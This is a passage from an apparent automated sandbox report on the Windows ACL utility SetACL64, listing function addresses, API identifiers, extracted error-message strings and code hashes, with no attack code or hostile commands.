                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$EventMutexReleaseReset
                                                  • String ID:
                                                  • API String ID: 4195719913-0
                                                  • Opcode ID: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
                                                  • Instruction ID: 1a6b623b35dda5394d857e541c5631c010eb6ddb2f6c738f6336e0fb2d83d285
                                                  • Opcode Fuzzy Hash: 53c02e3128979e1348d48c8753feaf8a9deea66a6de0b7d4b8ab2bd848f986ba
                                                  • Instruction Fuzzy Hash: EBB1AF32A18BC185EB21AF66D8483ED6361FB4D7A8F915231DA5C477E6DFB8D680C310
                                                  Function 00007FF7C1720520 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 464COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                  • String ID: AddACE$Audit ACEs cannot be set on shares.$Invalid access mode for this ACL type specified (e.g. you cannot add audit ACEs to the DACL, only to the SACL).$Invalid inheritance specified.$No trustee specified.
                                                  • API String ID: 3936042273-1410195417
                                                  • Opcode ID: c4ff67e74c09a2f73a2b1b69ce317e7775f2c5bfd494f419ddfd883c6a867768
                                                  • Instruction ID: e8c0cbd7d2a01c7e9b4fb66ad3816419303b4b27ff8e89338afee6fb1681cd76
                                                  • Opcode Fuzzy Hash: c4ff67e74c09a2f73a2b1b69ce317e7775f2c5bfd494f419ddfd883c6a867768
                                                  • Instruction Fuzzy Hash: 91229272A1874285EB00EF6AE4483ADB371FB48768FD04135D68C57A9ADFBCE585C720
                                                  Function 00007FF7C17426DC Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                  • API String ID: 2565136772-3242537097
                                                  • Opcode ID: a89e39b1e6dab9013fa2c69796a28cd76b0915c44a41f147d36bdeccd3bdc5f6
                                                  • Instruction ID: fc92e78b88846c09326e1a200fe821bcc96b62f038c94c06e6226d33ed5ea0e5
                                                  • Opcode Fuzzy Hash: a89e39b1e6dab9013fa2c69796a28cd76b0915c44a41f147d36bdeccd3bdc5f6
                                                  • Instruction Fuzzy Hash: 9F21D831A1AA0391FB56FF23B854578A3A0AF4D7B0FD44435C90E436A6EFACE4598730
                                                  Function 00007FF7C17223BF Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 316COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: > is probably incorrect.$AddDomain$Domain name <
                                                  • API String ID: 3668304517-3402377043
                                                  • Opcode ID: 331517c9e7e271e5a7fd40b88897b6cbc41d5860be722eeb7a384d55d81c47f0
                                                  • Instruction ID: d62f6689594a65b0513e8ed532ec216e3d8130a7a17859422baa4367db41ef5f
                                                  • Opcode Fuzzy Hash: 331517c9e7e271e5a7fd40b88897b6cbc41d5860be722eeb7a384d55d81c47f0
                                                  • Instruction Fuzzy Hash: C3D15272B1574185EB04EF6AE4483AD6322EB487A4F905235EB5C47AEADFBCE191C310
                                                  Function 00007FF7C1731760 Relevance: 18.5, APIs: 12, Instructions: 476COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ConvertFreeLocalString
                                                  • String ID:
                                                  • API String ID: 347880976-0
                                                  • Opcode ID: 7f36a04dbe1e1195e17bb9c4e0bc062f01be79f362d0442487ffcee1471e9626
                                                  • Instruction ID: 9befd4124bf4c6640bcd574fdac55f4eb842aece975ea2331397945b316062a4
                                                  • Opcode Fuzzy Hash: 7f36a04dbe1e1195e17bb9c4e0bc062f01be79f362d0442487ffcee1471e9626
                                                  • Instruction Fuzzy Hash: 9D228262A18B8185FB009F65E4443ADA771FB493B8F905235DF9C13AAADFB8E194C710
                                                  Function 00007FF7C17221F7 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: AddDomain$No domain specified.
                                                  • API String ID: 3668304517-2536513783
                                                  • Opcode ID: 99e0925a6b9fdd9a5b0408bba0820a297a0d0a02d1bb6155b4d59c8334b4e1bd
                                                  • Instruction ID: 55fe2b50eb823f61a816eafcc6fb1ac2f4d25cf078eacb59675a9f10a29598f7
                                                  • Opcode Fuzzy Hash: 99e0925a6b9fdd9a5b0408bba0820a297a0d0a02d1bb6155b4d59c8334b4e1bd
                                                  • Instruction Fuzzy Hash: 4451A372A5968691EB00AF6AE4883ADA322FB49764FC04531D74C039EBDFFCE191C710
                                                  Function 00007FF7C17149B0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 209COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$QueryValue$DefaultLangUser
                                                  • String ID: \StringFileInfo\%04X04B0\%s$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                                                  • API String ID: 124864902-1470331934
                                                  • Opcode ID: 84a91a20877e75cd1db0540d89d5f8e58374f05ff5f461cff2050a2cec5ccb81
                                                  • Instruction ID: 421e474c93a9d9875181602c6c40b04230936b45dc19c26634a9de2dc3acf1d3
                                                  • Opcode Fuzzy Hash: 84a91a20877e75cd1db0540d89d5f8e58374f05ff5f461cff2050a2cec5ccb81
                                                  • Instruction Fuzzy Hash: 85917632A18B4180EB00DF59E4402AEB771FB897F4F905135EA9D03AAADFBCE195C710
                                                  Function 00007FF7C171A7F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$GetctypeLocinfo::_Locinfo_ctor
                                                  • String ID: bad locale name
                                                  • API String ID: 249287498-1405518554
                                                  • Opcode ID: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
                                                  • Instruction ID: 8c13aebadedfb7450be25dd8ffba23062579612050c59f733781830f9930f6a9
                                                  • Opcode Fuzzy Hash: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
                                                  • Instruction Fuzzy Hash: D171AE23B09A8189FF11EF62D4502BCA3A4EF987A4F950035DE4D23B57DE78E5529320
                                                  Function 00007FF7C1736970 Relevance: 15.3, APIs: 10, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a5f5edd017b658e983cfd53b7e8145c4734415c703908048787467d75527855
                                                  • Instruction ID: f3040ae8ae12fe1df8235986b33032111db139c402d8fe40c87bd1b87188df1b
                                                  • Opcode Fuzzy Hash: 7a5f5edd017b658e983cfd53b7e8145c4734415c703908048787467d75527855
                                                  • Instruction Fuzzy Hash: D4B1BF72A15B8189EB14DF66E8807AC73A5FB48BACF904035EF8C07A5ADF78D591C350
                                                  Function 00007FF7C1739830 Relevance: 15.2, APIs: 10, Instructions: 188COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$Valid$DeleteEqualInformation
                                                  • String ID:
                                                  • API String ID: 439278688-0
                                                  • Opcode ID: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
                                                  • Instruction ID: feea9ad6e99f519772ba9738613a96c4f5d79952b72619a49a58ab1b820dc90b
                                                  • Opcode Fuzzy Hash: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
                                                  • Instruction Fuzzy Hash: FB815D22A0C68682EB60AF279544379A7A0FF8DB64FC44535CA8D87786DFBCE551C720
                                                  Function 00007FF7C1739B10 Relevance: 15.2, APIs: 10, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Valid$Equal$CopyLength
                                                  • String ID:
                                                  • API String ID: 1685539899-0
                                                  • Opcode ID: 3b1f6e0476a15e4dbeff593321d0a39690655f45c3396d74e8fe94f401111051
                                                  • Instruction ID: 9113f38976875259ec1c862af1316e60dc1aa129d2bfbd9380b683084341d98e
                                                  • Opcode Fuzzy Hash: 3b1f6e0476a15e4dbeff593321d0a39690655f45c3396d74e8fe94f401111051
                                                  • Instruction Fuzzy Hash: BC616D22B0A64685EB55AF279654379A3E1BF89BE4FC90031DD4E47686EEACE440C320
                                                  Function 00007FF7C17150C0 Relevance: 14.5, APIs: 6, Strings: 2, Instructions: 468COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                                                  • String ID: \\?\$\\?\UNC\
                                                  • API String ID: 3857612545-3019864461
                                                  • Opcode ID: 80f86e82870b07e6d5627ecd3545ff3dece0f910a388d86736f9a77694643264
                                                  • Instruction ID: bfe764db86b1c08f87988f2966ce7228f70c01b1cd3a03c8fa32392653cd2ad7
                                                  • Opcode Fuzzy Hash: 80f86e82870b07e6d5627ecd3545ff3dece0f910a388d86736f9a77694643264
                                                  • Instruction Fuzzy Hash: 7312D372B14A51C4FF08AF66E4443ADA362BB4ABA8FA16135CE1D177DACFBCD4448350
                                                  Function 00007FF7C1720CC0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 350COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                  • String ID: AddTrustee$No trustee specified.
                                                  • API String ID: 3668304517-2850116058
                                                  • Opcode ID: fb94bdf829771a45d73d4169ee65a2f39625c9cf73fdf6b67dd04f57a629b6a1
                                                  • Instruction ID: d9f4019390d2f4c46ba8bd908713ea434f10f457af2e6d83c0a69bd80f6a2f7a
                                                  • Opcode Fuzzy Hash: fb94bdf829771a45d73d4169ee65a2f39625c9cf73fdf6b67dd04f57a629b6a1
                                                  • Instruction Fuzzy Hash: 60E19372B1878181EF04AF6AE4883ADA362FB497A4F904135D74C07AAADFBCD491C710
                                                  Function 00007FF7C1718C30 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 318COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                  • String ID: false$true
                                                  • API String ID: 164343898-2658103896
                                                  • Opcode ID: f445c541dcabc8c76a2eb441bad9b69acf557a9bd182a87f89098410cebb741f
                                                  • Instruction ID: 6889783ac5fc2becc3aa69e150598e7e5604bd008174e069bc44f92971c80407
                                                  • Opcode Fuzzy Hash: f445c541dcabc8c76a2eb441bad9b69acf557a9bd182a87f89098410cebb741f
                                                  • Instruction Fuzzy Hash: 5CD1AB22B19B4289EB10EF62D4402EDB3A5EF4C7A8F864135DE4C67B8ADF78D516C350
                                                  Function 00007FF7C1740320 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 252COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Valid$Equal$Length
                                                  • String ID: unordered_map/set too long
                                                  • API String ID: 2183326427-306623848
                                                  • Opcode ID: ad27f92fef91cd753ab91c311a8dad5f0718926ff1c6d6db717cf738553d2b84
                                                  • Instruction ID: f76280d2646cf0c6112072f446cca3d44189008960575b39eaeeeafd4ff9e974
                                                  • Opcode Fuzzy Hash: ad27f92fef91cd753ab91c311a8dad5f0718926ff1c6d6db717cf738553d2b84
                                                  • Instruction Fuzzy Hash: 85A1AE22A09B4682EB50EF13E4487B9A3A4FF4CB94F984635DE8D47752DF7CE4608B50
                                                  Function 00007FF7C1767748 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 186COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$LoadString
                                                  • String ID: Operating system error message: $SetACL error message: $SetACL finished with error(s):
                                                  • API String ID: 498717675-3876775778
                                                  • Opcode ID: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
                                                  • Instruction ID: afdd5a752d12bc1daf07646c2e84a3abd955910958f16662f771c3a2debf063b
                                                  • Opcode Fuzzy Hash: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
                                                  • Instruction Fuzzy Hash: 7581C462A08BC689FB20AF36D8443ED6352FB59798FD08135D64C17A9BDFACD684C350
                                                  Function 00007FF7C17186B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_Locinfo_ctor
                                                  • String ID: bad locale name
                                                  • API String ID: 3718194943-1405518554
                                                  • Opcode ID: 1a7bf999381c07af3242a3cc31933243c0f84e1edb9a9b3fcdc9fb87e6ad8860
                                                  • Instruction ID: 0849a2c37a08c811f71f0adaab415e8717774aadec7b0b7e7088f0c213da54a5
                                                  • Opcode Fuzzy Hash: 1a7bf999381c07af3242a3cc31933243c0f84e1edb9a9b3fcdc9fb87e6ad8860
                                                  • Instruction Fuzzy Hash: 0761AE22B19A4189FB10FF62D4402FCB3A4EF987A8F990035DE4D53A56CEB8E521D324
                                                  Function 00007FF7C1714D30 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 164COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$ComputerName
                                                  • String ID: GetComputerNameAPIWrapper$Querying the computer name failed with:
                                                  • API String ID: 3471954800-1594087890
                                                  • Opcode ID: 065ba2d2fcd18019d0079e83448bdb250b984e5464f0ba45951be90b2cb0b2c0
                                                  • Instruction ID: 734bf4d958dcb1f4b17e2f91e8c671321423a1afe857324a302b70680769e869
                                                  • Opcode Fuzzy Hash: 065ba2d2fcd18019d0079e83448bdb250b984e5464f0ba45951be90b2cb0b2c0
                                                  • Instruction Fuzzy Hash: 6551A822A1878241EB10AF26E4443ADA361EB8D7B4F915335EA5D43BDADFBCD094C710
